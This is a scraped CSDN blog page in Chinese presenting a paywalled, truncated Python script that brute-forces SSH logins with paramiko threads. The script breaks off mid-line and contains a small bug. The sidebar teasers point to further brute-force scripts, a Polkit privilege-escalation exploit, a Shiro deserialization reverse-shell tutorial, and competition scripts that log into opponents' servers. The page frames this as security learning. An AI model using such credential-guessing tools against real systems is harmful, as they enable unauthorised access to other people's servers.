python安全攻防第七章ssh爆破脚本

最新推荐文章于 2024-02-04 15:21:01 发布
VIP文章 最新推荐文章于 2024-02-04 15:21:01 发布
阅读量571 收藏 1
点赞数
分类专栏: python安全学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34640691/article/details/109228053
版权 
#-*- coding:utf-8 -*-
import optparse
import sys
import os
import threading
import paramiko
#parasmiko为ssh登录模块


class ThreadWork(threading.Thread):
    def __init__(self,ip,usernameBlock,passwordBlock,port):
        threading.Thread.__init__(self)
        self.ip = ip
        self.port = port
        self.usernameBlock = usernameBlock
        self.passworkBlock = passwordBlock

    def run(self,username,password):
        '''

        用死循环防止因为error reading ssh protocol banner错误
        导致线程没有验证账号密码是否正确就抛弃掉
        '''

        while True:
            try:
                #设置日志文件
                paramiko.util.log_to_file('SSHattack.log')
                ssh = paramiko.SSHClient
                #接受壁纸本地Konow_host文件下的主机
                ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                #用sys.stdout.write输出信息,解决用print输出错位问题
                sys.stdout.write("[*]ssh[{}:{}:{}] => {}\n".format(username,password,self.port,self.ip))
                ssh.connect(hostname=self.ip,port=self.<
最低0.47元/天 解锁文章
willowpy
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
暴力破解SSHPython源码
06-14
# sshBrute # ssh爆破工具 ## * 用途 基于字典文件破解ssh账号密码 ## * 依赖 pip install paramiko ## * 使用方法: Usage: sshBrute.py [options] host Options: -h, --help show this help message and exit -p PORT, --port=PORT port, default 22 -u USERNAME, --username=USERNAME username, default root(Linux) -f PWD_PATH, --file=PWD_PATH password dict file,default dict/password.txt ## * 其它 * sshBrute.py ,单线程实现 * sshBruteV2.py ,多线程实现
python ssh模块
06-02
python ssh模块
python 实现ssh爆破
qq_35948609的博客
01-06 1880
import paramiko import argparse import sys def sshbrute(user,passw,host): # 设置 flag 为 0 ,在成功登录的时候再置为 1 flag = 0 try: # 使用 paramiko.SSHClient 创建 ssh 对象 ssh = paramiko.SSHClient() # 允许将信任的主机自动加入到host_allow 列表,此方法必须放在co.
Linux Polkit权限提升漏洞复现(CVE-2021-4034)
weixin_45945976的博客
01-26 7438
Linux Polkit权限提升漏洞 CVE-2021-4034 漏洞描述 Qualys 研究团队在 polkit 的 pkexec 中发现了一个内存损坏漏洞,该 SUID 根程序默认安装在每个主要的 Linux 发行版上。这个易于利用的漏洞允许任何非特权用户通过在其默认配置中利用此漏洞来获得易受攻击主机上的完全 root 权限。 漏洞影响 Polkit > 2009 漏洞复现 from ctypes import * from ctypes.util import find_library impo
Python脚本--爆破SSH
changmantong1045的博客
09-15 460
利用Pxssh是pexpect库的ssh专用脚本 环境:kali 代码: ''' Author:yw ''' from pexpect import pxssh import optparse from threading import * Max_Connect = 5 connection_lock = BoundedSemaphore(value=Max_Connect) def ...
shiro550反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-16 9494
本文是shiro550漏洞(CVE-2016-4437)的漏洞原理和漏洞复现。本文所有使用的工具和脚本都会在文末给出链接。使用vulhub搭建靶场,漏洞复现包括手动构造cookie的payload或使用shiro550的图形化漏洞利用工具,最终实现反弹shell和任意命令执行。
Python做一个安全攻防工具:端口嗅探器(2)
洛城的博客
12-28 900
这一篇主要实现端口的自动遍历。 根据端口的百科资料,一个ip的可用端口数是 2^16 = 65536 。 那么遍历一个ip的端口,就需要调用那么多次端口访问。因为经常要调用端口访问的代码块,我们先把这部分代码提取成一个函数。 # coding=utf-8 import socket def port_search(ip, port): address = (ip, port) # 地址必须是一个元祖,第一个是str,第二个是int client = socket.socket(
Python做一个安全攻防工具:端口嗅探器(7)
洛城的博客
02-01 958
传送门 本系列原创博文传送门: 用Python做一个安全攻防工具:端口嗅探器(1) 用Python做一个安全攻防工具:端口嗅探器(2) 用Python做一个安全攻防工具:端口嗅探器(3) 用Python做一个安全攻防工具:端口嗅探器(4) 用Python做一个安全攻防工具:端口嗅探器(5) 用Python做一个安全攻防工具:端口嗅探器(6) 本章目标 本章的目标是优化,暂时发现的问题有以下几个: 1、点击启动后,工具会卡死,直到结果出来 2、结果还不能输出到大编辑框内 3、编辑框的复
python安全攻防11章远程控制代码修改
devil8123665的博客
06-07 268
在书中源代码有点问题,经过调试修改如下:
Python安全攻防-从入门到入狱
热门推荐
Yasso的博客
01-31 1万+
Python安全攻防-从入门到入狱
根据指定hash值寻键爆破脚本Python实现)
08-22
代码说明 在所有可能的姓名+学号的字符串集合下,找到一个MD5散列值为"sdu_cst_20220610"的键。 通过不断构建随机姓+随机名+固定学号前缀+随机学号后缀组成的合法键进行MD5散列求值,与目标散列值比较,相等则求解...
python之——使用python编写爆破脚本
12-21
dvwa高级爆破 需要用户名 密码 token cookie 每次通过账号密码访问之前,需要获取token """ import urllib2 from bs4 import BeautifulSoup def getToken(): """提取token""" url=...
python多线程SSH登录并发脚本详解
01-01
测试系统中有一项记录ssh登录日志,需要对此进行并发压力测试。 于是用多线程进行python并发记录 因为需要安装的一些依赖和模块比较麻烦,脚本完成后再用pyinstaller打成exe包分发给其他测试人员一起使用。 1.脚本...
python攻防脚本scripts
12-01
python攻防脚本scripts;AWD比赛专用,管用有效;方便使用VSCODE直接运行,简单修改网址密码即可。
python制作企业邮箱的爆破脚本
12-23
按照师傅给的任务,写了一个企业邮箱的爆破脚本,后续还有FTP,SSH等一些爆破脚本。 我先说下整体思路: 总体就是利用python的poplib模块来从pop3服务器上交互,根据获取的相关信息,产生结果。POP3协议并不复杂,...
信息安全CTF-AWD脚本(小白向)
qq_39374987的博客
04-14 3759
信息安全比赛线下AWD简单python脚本0x00 ssh批量登录0x01 预留后门利用 0x00 ssh批量登录 如果攻防环节所有队伍的服务器密码都一样,这个脚本可以再别人修改密码之前登录对方靶机并拿到flag。也可以执行别的命令例如user add等,具体怎么用,看你发挥了。(有兴趣的还可以自行添加FTP功能) 所以我们在比赛使登录自己服务器的第一时间一定要修改密码,删除多余用户!!! ...
python ssh脚本_ssh爆破(python脚本)
weixin_39776298的博客
12-10 227
最近在乌云看到一份端口详解:为了锻炼自己,按照端口详解写脚本#!/usr/local/bin/ python# -*- coding: UTF-8 -*-__author__ = 'yangxiaodi'from multiprocessing import Poolfrom pexpect import pxsshimport sysreload(sys)sys.setdefaultencodi...
ssh爆破脚本
weixin_34245082的博客
09-08 505
前些天,基友发我一个ssh爆破工具,看起来很吊的样子。然后我就无聊自己写了个py脚本的。 单线程:慢成狗----- #coding:utf-8 #author:jwong import threading import os import time import paramiko import sys import Queue import socket BA...
3、安全开发-Python-协议库爆破&FTP&SSH&Redis&MYSQL&SMTP等
最新发布
m0_65842464的博客
02-04 1980
原理:python的一些库支持FTP、SSH、Redis、SMTP、Mysql等协议远程登录,只需要知道该服务器ip和端口,然后用本机准备好的用户名字典和密码字典进行循环组合尝试爆破登录,其中字典的好坏决定成功的几率,可以尝试弱口令集和社工方式获取,当然也不一定能成功,这只是锄头,挖不挖的进取决于是什么地。
python ssh 爆破_ssh爆破(python脚本)
05-16
SSH爆破是指通过尝试不同的用户名和密码组合来破解SSH服务的登录密码,以下是一个简单的Python脚本实现SSH爆破: ```python import paramiko import sys # 定义需要尝试的用户名和密码列表 usernames = ['root'] ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值